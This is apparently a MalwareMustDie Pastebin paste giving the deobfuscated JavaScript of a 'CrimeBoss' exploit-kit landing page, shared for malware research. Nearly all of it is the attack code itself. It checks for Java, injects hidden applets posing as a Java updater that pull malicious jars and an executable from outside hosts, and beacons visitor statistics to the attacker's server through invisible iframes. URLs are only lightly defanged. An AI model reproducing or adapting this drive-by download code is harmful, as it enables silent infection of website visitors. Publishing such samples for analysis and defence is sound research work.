MalwareMustDie

#malwareMustDie - CrimeBoss landing Page | 2013 Jan 29

Jan 29th, 2013
377
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. // MalwareMustDie
  2. // PiC: @Hulk_Crusader
  3. // Analyzed by: @unixfreaxjp
  4.  
  5. var jsm_lab_on = true;
  6. var jsm_lab_access = 'h00p://boyssuitsonline.com/jex/index.php?action=stats_access';
  7. var jsm_lab_javaon = 'h00p://boyssuitsonline.com/jex/index.php?action=stats_javaon';
  8. var jsm_lab_javaoff = 'h00p://boyssuitsonline.com/jex/index.php?action=stats_javaoff';
  9. var jsm_lab_loaded = 'h00p://boyssuitsonline.com/jex/index.php?action=stats_loaded';
  10. var jsm_lab_loadfail = 'h00p://boyssuitsonline.com/jex/index.php?action=stats_loadfail';
  11.  
  12. var jsm_loaded = false;
  13. var jsm_applet_index = 1;
  14. var jsm_applet_count = 10;
  15. var jsm_applet_prefix = 'amor';
  16. var jsm_applet_url = '--h00p://launafauna.com/app/';
  17.  
  18. var jsm_popunder_url = 'h00p://celularbom.com/js/clickpop.js';
  19.  
  20. function JSM_getAppletURL()
  21. {
  22. return jsm_applet_url + jsm_applet_prefix + jsm_applet_index + '.jar';
  23. }
  24.  
  25. function JSM_createIframe(src)
  26. {
  27. var iframe = document.createElement('iframe');
  28. iframe.src = src;
  29. iframe.style.visibility = 'hidden';
  30. iframe.style.display = 'inline';
  31. iframe.style.margin = '0';
  32. iframe.style.padding = '0';
  33. iframe.style.border = 'none';
  34. iframe.style.width = '0';
  35. iframe.style.height = '0';
  36. return iframe;
  37. }
  38.  
  39. function JSM_createScript(src)
  40. {
  41. var script = document.createElement('script');
  42. script.type = 'text/javascript';
  43. script.src = src;
  44. return script;
  45. }
  46.  
  47. function getXMLh00pRequest()
  48. {
  49. if (window.XMLh00pRequest) return new window.XMLh00pRequest;
  50. else
  51. {
  52. try
  53. {
  54. return new ActiveXObject("Microsoft.XMLh00p");
  55. }
  56. catch(ex)
  57. {
  58. return null;
  59. }
  60. }
  61. }
  62.  
  63. function JSM_labReport(url)
  64. {
  65. var oReq = getXMLh00pRequest();
  66. if (oReq)
  67. {
  68. oReq.onreadystatechange = function ()
  69. {
  70. if (oReq.readyState == 4)
  71. {
  72. if (oReq.status == 200)
  73. {
  74. //window.alert('from callback ' + oReq.responseText);
  75. }
  76. }
  77. };
  78.  
  79. oReq.open("GET", url, true);
  80. oReq.send();
  81. }
  82. }
  83.  
  84. function JSM_labReport2(url)
  85. {
  86. var hhBody = document.body;
  87. if (hhBody)
  88. {
  89. hhBody.insertBefore(JSM_createIframe(url), hhBody.firstChild);
  90. }
  91. }
  92.  
  93. function JSM_createImg(src)
  94. {
  95. var img = document.createElement('img');
  96. img.src = src;
  97. return img;
  98. }
  99.  
  100. function JSM_createSpan(html)
  101. {
  102. var span = document.createElement('span');
  103. span.innerHTML = html;
  104. return span;
  105. }
  106.  
  107. function JSM_getAppletHtml()
  108. {
  109. return '<applet name="Java(TM) Platform SE Auto Updater" code="amor.class" archive="' + JSM_getAppletURL() + '" width="0" height="0" style="visibility: hidden" mayscript="true"> <param name="link" value="h00p://patuamusic.com.br/app/rh.exe;exe;0"> </param></applet>';
  110. }
  111.  
  112. function JSM_getAppletHtml_Y()
  113. {
  114. return '<applet name="Java(TM) Platform SE Auto Updater" code="amor.class" archive="' + jsm_applet_url + 'java7.jar?r=' + Math.floor(100000 + (Math.random()*999999 + 1)) + '" width="0" height="0" style="visibility: hidden"> <param name="link" value="h00p://patuamusic.com.br/app/rh.exe;exe;0"> </param> </applet>';
  115. }
  116.  
  117. function JSM_getAppletHtml_X()
  118. {
  119. return '<applet name="Java(TM) Platform SE Auto Updater" code="amor.class" archive="' + jsm_applet_url + 'jmx.jar?r=' + Math.floor(100000 + (Math.random()*999999 + 1)) + '" width="0" height="0" style="visibility: hidden"> <param name="link" value="h00p://patuamusic.com.br/app/rh.exe;exe;0"> </param> </applet>';
  120. }
  121.  
  122. //Normal
  123. function JSM_onLoadA()
  124. {
  125. //if (jsm_lab_on) JSM_labReport(jsm_lab_loaded);
  126. if (jsm_lab_on) JSM_labReport2(jsm_lab_loaded);
  127. }
  128.  
  129.  
  130. //Java JMX
  131. function JSM_onLoadB()
  132. {
  133. //if (jsm_lab_on) JSM_labReport(jsm_lab_loaded);
  134. if (jsm_lab_on) JSM_labReport2(jsm_lab_loaded + '&k=j');
  135. }
  136.  
  137.  
  138. //Java 7
  139. function JSM_onLoadC()
  140. {
  141. //if (jsm_lab_on) JSM_labReport(jsm_lab_loaded);
  142. if (jsm_lab_on) JSM_labReport2(jsm_lab_loaded+ '&k=c');
  143. }
  144.  
  145. function JSM_onLoadFail()
  146. {
  147. //if (jsm_lab_on) JSM_labReport(jsm_lab_loadfail);
  148. if (jsm_lab_on) JSM_labReport2(jsm_lab_loadfail);
  149. alert(123);
  150. if (jsm_applet_index < jsm_applet_count)
  151. {
  152. jsm_applet_index++;
  153.  
  154. var hBody = document.body;
  155. if (hBody)
  156. {
  157. var html = JSM_getAppletHtml();
  158. hBody.insertBefore(JSM_createSpan(html), hBody.firstChild);
  159. }
  160. }
  161. }
  162.  
  163. function JSM_onInit(hBody)
  164. {
  165.  
  166. //if (jsm_lab_on) JSM_labReport(jsm_lab_access);
  167. if (jsm_lab_on) JSM_labReport2(jsm_lab_access);
  168.  
  169. if (hBody)
  170. {
  171. var html = '';
  172.  
  173. if (navigator.javaEnabled())
  174. {
  175. //java on
  176.  
  177. html = JSM_getAppletHtml_Y() + JSM_getAppletHtml_X() + JSM_getAppletHtml();
  178.  
  179. //if (jsm_lab_on) JSM_labReport(jsm_lab_javaon);
  180. if (jsm_lab_on) JSM_labReport2(jsm_lab_javaon);
  181.  
  182. hBody.insertBefore(JSM_createSpan(html), hBody.firstChild);
  183. }
  184. else
  185. {
  186. //report java disabled access
  187. if (jsm_lab_on) JSM_labReport2(jsm_lab_javaoff);
  188. }
  189.  
  190. //hBody.insertBefore(JSM_createScript(jsm_popunder_url), hBody.firstChild);
  191. }
  192. }
  193.  
  194. function JSM_onCreate()
  195. {
  196. if (jsm_loaded) return;
  197.  
  198. var myBody = document.body;
  199. if (myBody)
  200. {
  201. jsm_loaded = true;
  202. JSM_onInit(myBody);
  203. }
  204. else
  205. {
  206. setTimeout("JSM_onCreate()", 100);
  207. }
  208. }
  209.  
  210. function WindowOnload(f)
  211. {
  212. var prev = window.onload;
  213. window.onload = function() { if (prev) prev(); f(); }
  214. }
  215.  
  216. WindowOnload(JSM_onCreate);
  217. setTimeout("JSM_onCreate()", 7000);
RAW Paste Data